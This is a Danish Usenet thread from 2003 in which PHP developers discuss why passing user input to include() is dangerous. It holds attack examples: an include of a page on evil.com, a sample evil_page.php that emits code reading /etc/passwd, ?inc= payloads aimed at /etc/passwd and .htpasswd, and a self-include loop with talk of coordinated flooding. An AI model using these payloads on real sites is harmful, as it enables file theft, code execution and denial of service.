sikkerhed i php
Fra : Arvid Böttiger

Dato : 11-03-03 01:20

Jeg har lige siddet og læst nogle artikler om sikkerhed i php.
En god genganger er at man skal passe på med brugerindput i include() så der
ikke kommer til at stå include("http://evil.com/evil_page.php").

Men hvorfor det ? Selvfølgelig er det bedste hvis brugeren ikke har lov til
den slags, men ens server modtager jo kun HTML, og hvis den skulle modtage
lidt php ville den jo aldrig eksekvere det.
Derfor vil jeg da mener at der ikke er noget reelt sikkerhedshul, men på den
anden side ville det vel ikke stå i artiklerne hvis det var ufarligt.

mvh

Arvid Böttiger
--
Never argue with idiots, they will bring you down to their level, and then
beat you on experience.

Fra : Kim Schulz

Dato : 10-03-03 16:41

On Mon, 10 Mar 2003 16:20:18 -0800
"Arvid Böttiger" <Arvid@[NOSPAM]bottiger.com> wrote:
> [...]
> Derfor vil jeg da mener at der ikke er noget reelt sikkerhedshul, men
> på den anden side ville det vel ikke stå i artiklerne hvis det var

prøv at kalde siden evil_page.inc og gennemtænk det så en gang mere,
eller prøv at se på evil.com som en server der ikke understøtter php.

--
Kim Schulz - Freelance Development | Small is beautiful.
Email : kim @ schulz.dk |

Fra : Lars Dybdahl

Dato : 10-03-03 16:42

Arvid Böttiger wrote:
> der ikke kommer til at stå include("http://evil.com/evil_page.php").
> Men hvorfor det ?

To årsager:

1) Jo, hvis siden indeholder php, så vil det blive eksekveret!!!
2) Fordi DNS systemet ikke er 100% hackersikret, og at evil.com derfor kan
pege på hvad som helst.

Et eksempel på en evil_page.php, der ikke er god, er denne:

<?php
echo "<? include (\"/etc/passwd\"); ?>";
?>

evil_page genererer med andre ord noget, som resulterer i php-kode, som
include() så vil udføre.

Lars.

--
Freelance programmør
Programmering mod timebetaling

Fra : Arvid Böttiger

Dato : 11-03-03 07:48

Sikker på det ? Det er jeg ikke.
lad os sige jeg har en *.txt fil som ser sådan her ud:

echo "Kalkun";

Nu får jeg så min php-side til at inkludere *.txt-filer (ekstrent) og hvad
gør den så ?
Hvis den udførte koden og udskrev "Kalkun" (altså uden ") er jeg enig i at
det ville være et stort sikerhedshul, men det gør den ikke.
I stedet udskriver min php-fil "echo "Kalkun";" og derfor vil der være
ligemeget hvor onde mine scripts er. De vil ikke kunne lave skade på
serveren.

Nu brugte jeg selvfølgelig kun en *.txt-fil, men det var for at undgå
forvirring.
jeg kunne vel lige så godt have brugt en php-fil som udskriver noget
php-kode (som du viser), men det kan mit script som inkluderer det hele jo
ikke se forskel på.

er det mig som er helt galt på det ?
Det tror jeg ikke. (men tør ikke æde en eller gammel hat på det)

mvh

Arvid Böttiger

Fra : Henrik Stidsen

Dato : 11-03-03 13:41

"Arvid Böttiger" <Arvid@[NOSPAM]bottiger.com> wrote in

> echo "Kalkun";

Den skal vist se sådan her ud før den virker ordentligt:

<?php
   echo "Kalkun";
?>

--
..: Henrik Stidsen - HS235.dk ::...
http://hs235.dk/cracks - http://susie.dk/

Fra : Kim Schulz

Dato : 10-03-03 23:07

On Mon, 10 Mar 2003 22:47:44 -0800
> [...]
> hele jo ikke se forskel på.
>
> er det mig som er helt galt på det ?
> Det tror jeg ikke. (men tør ikke æde en eller gammel hat på det)

det må være en opsætning hos dig som er anderledes så, for jeg har lige
testet hos 5 af de større webhotel udbydere i landet, og hos dem alle
lavede en
<?
include "http://www.server.foo/min-fil-med-php-i.txt";
?>

kørsel af den php kode som filen indeholdt.

--
Kim Schulz - Freelance Development | "This generation may be the one
Email : kim @ schulz.dk | that will face Armageddon." --

Fra : Jesper Brunholm

Dato : 11-03-03 08:57

Kim Schulz wrote:
> [...]

Det var klogt!

Hele forskellen ligger i php-versionen. I manualen står der under
include() at

"Windows versions of PHP prior to PHP 4.3 do not support accessing
remote files via this function, even if allow_url_fopen is enabled. "

- så mon ikke det simpelt hen er det der er forskellen? På en del
servere vil php ikke parse included content igennem hvis det bliver
included via http (det var også det jeg havde lært engang), men på de
nyere servere der bliver det altså parset igennem, så der _er_ seriøse
overvejelser at gøre sig omkring sin include-brug.

/Jesper Brunholm

--
H.C. Andersen-Centret med nyt design: <http://www.andersen.sdu.dk/>
Phønix - dansk folk-musik fra unge musikere - <http://www.phonixfolk.dk/>

Fra : Arvid Böttiger

Dato : 11-03-03 22:49

Det var satans!
Skrev et lille eksempel for at afprøve det, og jeg er ikke særlig glad for
resultatet:
http://www.knast.dk/sikkerhed/?inc=http://www.knast.dk/sikkerhed/http_inc.tx

Der er nemlig alt for mange sider derude som bare bruger include() uden at
tænkte sig om, og hvor nemt er det ikke at skrive et lille script som
kopierer et komplet file-manager-system ind på serveren :(

mvh

Arvid Böttiger

Fra : Kim Schulz

Dato : 11-03-03 14:02

On Tue, 11 Mar 2003 13:49:28 -0800
> [...]
> uden at tænkte sig om, og hvor nemt er det ikke at skrive et lille
> script som kopierer et komplet file-manager-system ind på serveren :(

det er et ganske kendt fænomen, og det er også netop derfor der advares
imod det. Søg på "php source injection" og du vil finde tonsvis af den
slags.

og det er ikke blot eksterne sider som giver problemer, men også
interne, for hvad hvis man benytter ?inc=/etc/passwd eller
?inc=.htaccess eller .htpasswd osv.

--
Kim Schulz - Freelance Development | Yow! I want to mail a bronzed
Email : kim @ schulz.dk | artichoke to Nicaragua!

Fra : Henrik Stidsen

Dato : 11-03-03 18:04

Kim Schulz <kim@schulz.dk> wrote in

> og det er ikke blot eksterne sider som giver problemer, men også
> interne, for hvad hvis man benytter ?inc=/etc/passwd eller
> ?inc=.htaccess eller .htpasswd osv.

Og den mindre slemme:
/index.php?p=index.php
- et uendeligt loop der kan give problemer i længden...

Fra : Kim Schulz

Dato : 11-03-03 19:05

[snip]
> Og den mindre slemme:
> /index.php?p=index.php
> - et uendeligt loop der kan give problemer i længden...

browseren plejer at sige stop før serveren gør Det kan dog klares
med en wget ........ -O /dev/null

--
Kim Schulz - Freelance Development | Don't ever slam a door; you might
Email : kim @ schulz.dk | want to go back.

Fra : Henrik Stidsen

Dato : 11-03-03 22:54

> browseren plejer at sige stop før serveren gør Det kan dog
> klares med en wget ........ -O /dev/null

Ja der skal ikke mange trick til før der sker noget.
Jeg prøvede det på en side der brugte en så dårlig include til at
hente indholdet. Jeg fik hentet 4-5 mb ned uden at browser eller
server sagde stop.

Forestil dig hvis det blev koordineret mellem 10-20 maskiner - eller
man f.eks. satte en downloadcache til at hente siden (en server der
bare henter filen for fuld skrald).